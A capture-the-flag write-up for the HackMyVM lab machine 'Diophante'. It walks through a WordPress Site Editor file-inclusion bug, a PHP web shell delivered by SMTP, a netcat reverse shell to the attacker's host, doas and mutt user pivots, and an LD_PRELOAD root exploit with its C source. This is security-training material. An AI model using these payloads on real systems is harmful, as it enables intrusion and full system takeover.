HMV Diophante Summary
This Linux machine with SSH, Web and a filterd SMTP services enabled at first, and leak a port
knocking notes and wordpress site after simple web enumeration. Then I discover an LFI vulnerability
with wpscan, then upload a webshell(php version) to mail server to trigger RCE to obtain the
foothold. Then a SUID bit set program doas which configure interesting rule, I leverage it to
lateral to another user. Utimately leads to root by its sudo rule which allow env_pollution(LD_PRELOAD).
Scope
- Name: Diophante
- Difficulty: (6/10)
- OS: Linux
- IP: diophante.hmv (192.168.56.145)
Enumeration
First I know there're maybe three services enabled from the nmap scanning result.
22/tcp open ssh 25/tcp filtered smtp 80/tcp open http
Web
Then I obtain two critical clues from the enumeration of web service.
❯ curl http://diophante.hmv/note.txt
Don't forget: 7000 8000 9000
admin
After knocking these ports the SMTP service will be enabled.
http://diophante.hmv/blog is wordpress site.
WordPress Vulnerability(LFI)
The result of the wpscan quickly hint me there's an LFI vulnerability.
[+] site-editor | Location: http://diophante.hmv/blog/wp-content/plugins/site-editor/ | Latest Version: 1.1.1 (up to date) | Last Updated: 2017-05-02T23:34:00.000Z | Readme: http://diophante.hmv/blog/wp-content/plugins/site-editor/readme.txt | | Found By: Known Locations (Aggressive Detection) | - http://diophante.hmv/blog/wp-content/plugins/site-editor/, status: 200 | | [!] 1 vulnerability identified: | | [!] Title: Site Editor <= 1.1.1 - Local File Inclusion (LFI) | References: | - https://wpscan.com/vulnerability/4432ecea-2b01-4d5c-9557-352042a57e44 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7422 | - https://seclists.org/fulldisclosure/2018/Mar/40 | - https://github.com/SiteEditor/editor/issues/2 | | Version: 1.1.1 (80% confidence) | Found By: Readme - Stable Tag (Aggressive Detection) | - http://diophante.hmv/blog/wp-content/plugins/site-editor/readme.txt
Confirm that vuln with curl:
❯ curl 'http://diophante.hmv/blog/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode _pattern.php?ajax_path=/etc/passwd' --output - root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin _apt:x:100:65534::/nonexistent:/usr/sbin/nologin systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin messagebus:x:104:110::/nonexistent:/usr/sbin/nologin sshd:x:105:65534::/run/sshd:/usr/sbin/nologin sabine:x:1000:1000:sabine,,,:/home/sabine:/bin/rbash systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin mysql:x:106:113:MySQL Server,,,:/nonexistent:/bin/false postfix:x:107:114::/var/spool/postfix:/usr/sbin/nologin leonard:x:1001:1001:,,,:/home/leonard:/bin/bash
And there're two normal user sabine and leonard. I try some common files with nothing interesting.
Upload web shell by SMTP
After that, I still need some RCE to obtain the foothold. Since there're no code for execution, I want to upload a webshell then includes it by LFI. So SMTP stands out.
❯ nc diophante.hmv 25 220 debian ESMTP Postfix (Debian/GNU) helo leonard 250 debian mail from: <[email protected]> 250 2.1.0 Ok rcpt to: leonard 250 2.1.5 Ok data 354 End data with <CR><LF>.<CR><LF> <?php system($_GET["cmd"]);?> . 250 2.0.0 Ok: queued as 1B2CC80ABC quit 221 2.0.0 Bye
Then access it with that LFI vulnerability.
❯ curl 'http://diophante.hmv/blog/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode _pattern.php?ajax_path=/var/mail/leonard&cmd=id' --output - From [email protected] Wed Apr 22 12:01:30 2026 Return-Path: <[email protected]> X-Original-To: leonard Delivered-To: leonard@debian Received: from leonard (unknown [192.168.56.1]) by debian (Postfix) with SMTP id 1B2CC80ABC for <leonard>; Wed, 22 Apr 2026 11:59:33 +0200 (CEST) uid=33(www-data) gid=33(www-data) groups=33(www-data)
Yeah, it successes! Then the following payload leads to foothold.
❯ curl 'http://diophante.hmv/blog/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode _pattern.php?ajax_path=/var/mail/leonard' -G --data-urlencode 'cmd=nc 192.168.56.1 1234 -e /bin/bash'
Privilege Escaltion
SUID files
www-data@diophante:/home$ find / -mount -perm -u=s 2>/dev/null /usr/bin/mount /usr/bin/xclip /usr/bin/newgrp /usr/bin/gpasswd /usr/bin/doas /usr/bin/chsh /usr/bin/su /usr/bin/umount /usr/bin/passwd /usr/bin/chfn /usr/bin/sudo /usr/lib/eject/dmcrypt-get-device /usr/lib/openssh/ssh-keysign /usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/sbin/pppd
www-data -> sabine
The SUID files scanning quickly discover a interesting program doas. But directly run it with some
user not successes. Then I go to its configuration.
www-data@diophante:/home$ cat /etc/doas.conf permit nopass www-data as sabine cmd /usr/bin/setsid permit nopass sabine as leonard cmd /usr/bin/mutt
I(www-data) could run setsid with permission of sabine! Things are straightforward now.
www-data@diophante:/home$ doas -u sabine /usr/bin/setsid /bin/bash bash: cannot set terminal process group (-1): Inappropriate ioctl for device bash: no job control in this shell sabine@diophante:/home$ id uid=1000(sabine) gid=1000(sabine) groups=1000(sabine),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109 (netdev)
sabine -> leonard
In addition to run setsid like that, the user sabine could also run mutt which can execute
shell command like less as leonard.
mutt can execute shell command by ! keybind
leonard -> root
The sudo rule of the user leonard:
leonard@diophante:~$ sudo -l
Matching Defaults entries for leonard on diophante:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
env_keep+=LD_PRELOAD
User leonard may run the following commands on diophante:
(ALL : ALL) NOPASSWD: /usr/bin/ping
Notice that env_keep+=LD_PRELOAD there, so I could injection shared library (so) into ping by
that environment variable!
#include <stdio.h> #include <stdlib.h> #include <unistd.h> void _init() { unsetenv("LD_PRELOAD"); setuid(0); setgid(0); system("/bin/bash"); }
Then compile it into shared library and
leonard@diophante:~$ sudo LD_PRELOAD=./exp.so /usr/bin/ping bash: cannot set terminal process group (5380): Inappropriate ioctl for device bash: no job control in this shell root@diophante:/home/leonard# id uid=0(root) gid=0(root) groups=0(root)